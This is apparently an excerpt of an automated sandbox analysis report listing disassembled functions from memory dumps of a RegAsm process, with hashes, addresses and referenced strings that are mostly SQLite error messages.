API String ID: 0-2528248365
Opcode ID: 701208fe915a2724154972895e81adee301eb8ddc2b213a77409bf6a68a9205f
Instruction ID: c848a5614e9b13dcf475d6555531e3d097269b1c285d65a16cb5f560b22db1e9
Opcode Fuzzy Hash: 701208fe915a2724154972895e81adee301eb8ddc2b213a77409bf6a68a9205f
Instruction Fuzzy Hash: 8F3188A664079146D7219F389C437E7B7E0DF61713F44446EE9CAC7682E322F496C3A1

Function 1B7A7ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 1B7A7F92
no such tokenizer: %s, xrefs: 1B7A7F1B

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: 9bb01167e75a8b2a9e16ed86fc73ef61f88482903f76b982c2ad1632baa17903
Instruction ID: e31947b7e73a9e118279be435c4315c28a71ea53e6711a6a17eb39f6b4b7f05b
Opcode Fuzzy Hash: 9bb01167e75a8b2a9e16ed86fc73ef61f88482903f76b982c2ad1632baa17903
Instruction Fuzzy Hash: A631A1767012159FCB50CF29D881AAAF3E4EF84665F19066DF989DB300E332E946CB61

Function 1B6D1420 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6D146B
%s at line %d of [%.10s], xrefs: 1B6D147A
database corruption, xrefs: 1B6D1475

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: cda1f4674fc9e0d443267315f7b2c8a8435f03721a8369a04b2ea5debfde29d6
Instruction ID: d8db1b6b07e603a14f87b40291c9df3b0e02a131b4922e80b0aabbbcf6874157
Opcode Fuzzy Hash: cda1f4674fc9e0d443267315f7b2c8a8435f03721a8369a04b2ea5debfde29d6
Instruction Fuzzy Hash: 9331AFB56093918FC310CF29D9409A6FBE0EF95215B04859EE4C68BA42D731E549CBA1

Function 1B68F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 1B68F0C4

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: acfa9e9f1571f074bba19d4bc7683fefb9f801085ad9abd6739aa8aacbe116ce
Instruction ID: 4a027025d62c41f922e044dd8b905d2f5fa7e5a22209007b0eef5b364a8d1062
Opcode Fuzzy Hash: acfa9e9f1571f074bba19d4bc7683fefb9f801085ad9abd6739aa8aacbe116ce
Instruction Fuzzy Hash: 03313AF69003029FCF11BF14DC426DB73A0BF60720F404E29FAA5A6290F732E95486A2

Function 1B6C5280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C52F2
%s at line %d of [%.10s], xrefs: 1B6C5301
database corruption, xrefs: 1B6C52FC

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 622937c52ecec9d0ff0b942e4debfe362ebfa0ab61e2a8da2b6b3cee58bb70e8
Instruction ID: 6818d26140c373d954816d5940197227e22b238c79d679ffdddb094d9853fbbe
Opcode Fuzzy Hash: 622937c52ecec9d0ff0b942e4debfe362ebfa0ab61e2a8da2b6b3cee58bb70e8
Instruction Fuzzy Hash: 4F11577760121067CF105A58FC42CDBBFE5EFC46B6F090565FA4857222E322D921D3B2

Function 1B6CFD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6CFDE6, 1B6CFE61
%s at line %d of [%.10s], xrefs: 1B6CFE82
database corruption, xrefs: 1B6CFE7D

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 09f124fa045fb16c8a23724289404ae3c6aaf40de592ea2384ce889ce77ccea6
Instruction ID: 498f403fa6098da58e200b3085336dd01bf878e83a0c9af17046ca26c0e08500
Opcode Fuzzy Hash: 09f124fa045fb16c8a23724289404ae3c6aaf40de592ea2384ce889ce77ccea6
Instruction Fuzzy Hash: 84311AA85152818AD3159F24C4003A7BA61FF25749F68C4CDE4498F753E37BC8C7DBAA

Function 1B68B220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B68B229
%s at line %d of [%.10s], xrefs: 1B68B238
misuse, xrefs: 1B68B233

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 31096e342c90ce35fcd688bd4e3cd733d7a0b9fd47d1f3fc4eb9176e9af5466c
Instruction ID: aa97c34b0e3f6c9ff311784545a95b1a34013496a722e6ddbdb38206fdbf1240
Opcode Fuzzy Hash: 31096e342c90ce35fcd688bd4e3cd733d7a0b9fd47d1f3fc4eb9176e9af5466c
Instruction Fuzzy Hash: D011D5F5600701ABDB019A28AC95EEF77A9BFE4604F494428F955DB201EB31E54AC3A2

Function 1B6DD6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 1B6DD725

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 2ca2f305d3c5e2115096bf6b50b73fa11b054596cb2ea0397d137ab7ac7ea2fb
Instruction ID: 2eb56e3e4c32996a0c6f3677e085c6666eb725d6cc9b1ab35b1ed78b47d8a13a
Opcode Fuzzy Hash: 2ca2f305d3c5e2115096bf6b50b73fa11b054596cb2ea0397d137ab7ac7ea2fb
Instruction Fuzzy Hash: 021172F59803219BDB01AF15DC88ADA33A8FFA0A59F040166F99CD6204D735D558CBA2

Function 1B69F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 1B69F8ED

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 2b4c084d6aaa49dbb956e9d8bc1b0563db667519b4249dd884b1d33249f2ec45
Instruction ID: fdc83cbb64bbeb7aa4681a803989090e4d92c91391dc2dcdceed152caea8429d
Opcode Fuzzy Hash: 2b4c084d6aaa49dbb956e9d8bc1b0563db667519b4249dd884b1d33249f2ec45
Instruction Fuzzy Hash: 9E11BFB5C04B11AEDF01BF28BC05BCA37A16F22325F060799E9955A1A2E760E1D8C7D2

Function 1B731F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 1B731F92

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 6387bbb5c2de137364cbc637184d179a8d49d550bb7483a2aa7ab1d617a21ac4
Instruction ID: 0d723de28ace804233e01c0edf374ed7295735238270364e8b331116e5dc0d56
Opcode Fuzzy Hash: 6387bbb5c2de137364cbc637184d179a8d49d550bb7483a2aa7ab1d617a21ac4
Instruction Fuzzy Hash: 5F0104B260A2116EDB109A649C01BDB7BD4DF41321F10062CF895962E1EB72A811C3E2

Function 1B691DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B691E53
%s at line %d of [%.10s], xrefs: 1B691E63
misuse, xrefs: 1B691E59

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: e49b25f4510910c1ec9b1a8664bd6e4e7f9b73ed718144a467c4f7868f5baf7c
Instruction ID: d38b93d96f21fe27e1091b674140ac1a1161378ab0b33a75ba7997f4925b67b3
Opcode Fuzzy Hash: e49b25f4510910c1ec9b1a8664bd6e4e7f9b73ed718144a467c4f7868f5baf7c
Instruction Fuzzy Hash: 0F11A0B8708551EFD718CE2AE844AD6BBB8AF66A05F14045EF045CB322D334E945C7A2

Function 1B6AF0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B6AF105

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: a3e18e89aefdfa0088a57b8718a49e8ee7025f945affdcfd00a11efe93eabec3
Instruction ID: 828fda69bfe6fbfcdff72820d6f3d66d275bc5ef9517f672d452c5a6c2b83c62
Opcode Fuzzy Hash: a3e18e89aefdfa0088a57b8718a49e8ee7025f945affdcfd00a11efe93eabec3
Instruction Fuzzy Hash: C7019EB66042415EDB61966EFC40FD7BBD8EBD4621F05046AF5ADC3201D261AC8583A1

Function 1B6F9180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 1B6F9192

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: e5fcded197eac5e49de9e3ba26cece78bd1511baf6fe28a4da9280dec7ba73d9
Instruction ID: c4661f01169a2708ffa8fddb1e2c3433bbd8d41ab9e93192bb246d592659a132
Opcode Fuzzy Hash: e5fcded197eac5e49de9e3ba26cece78bd1511baf6fe28a4da9280dec7ba73d9
Instruction Fuzzy Hash: AFF027A2B053523BDB008679BC81BCAEBD5AB64161F444635F40C92154D312BCA183D1

Function 1B6A7F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1B6A7F76

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: c8417227ba882ca1ac31d21dfb13beb6a161c0604cf127696377716670763341
Instruction ID: 59f0c2369a93136322d7304b827685699972a6dfffa48dd052ece24d250c014c
Opcode Fuzzy Hash: c8417227ba882ca1ac31d21dfb13beb6a161c0604cf127696377716670763341
Instruction Fuzzy Hash: 73F0F0BAA043028ADF105F29FC02BC9B7D0AFE1321F15012AF84896290E764A88587A1

Function 00411A94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411E92,00000000), ref: 00411A9F
HeapAlloc.KERNEL32(00000000,?,00411E92,00000000), ref: 00411AA6
wsprintfW.USER32 ref: 00411AB7

Strings

%hs, xrefs: 00411AB1

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: b006a00c94b64a5e6a63bf74cb6fc989fd022a47c30863d2ab4432066fb547e3
Instruction ID: 1c615c54e01f175df760b42947a92ff9fe8b5b224df655030d05607843f00ac6
Opcode Fuzzy Hash: b006a00c94b64a5e6a63bf74cb6fc989fd022a47c30863d2ab4432066fb547e3
Instruction Fuzzy Hash: 39D05E3174022477C6202BA4AC0AFA57E38EB05AA3F800030FA0A86151CD698A1147FA

Function 1B786B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B786B50
cannot open file, xrefs: 1B786B59
%s at line %d of [%.10s], xrefs: 1B786B5E

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

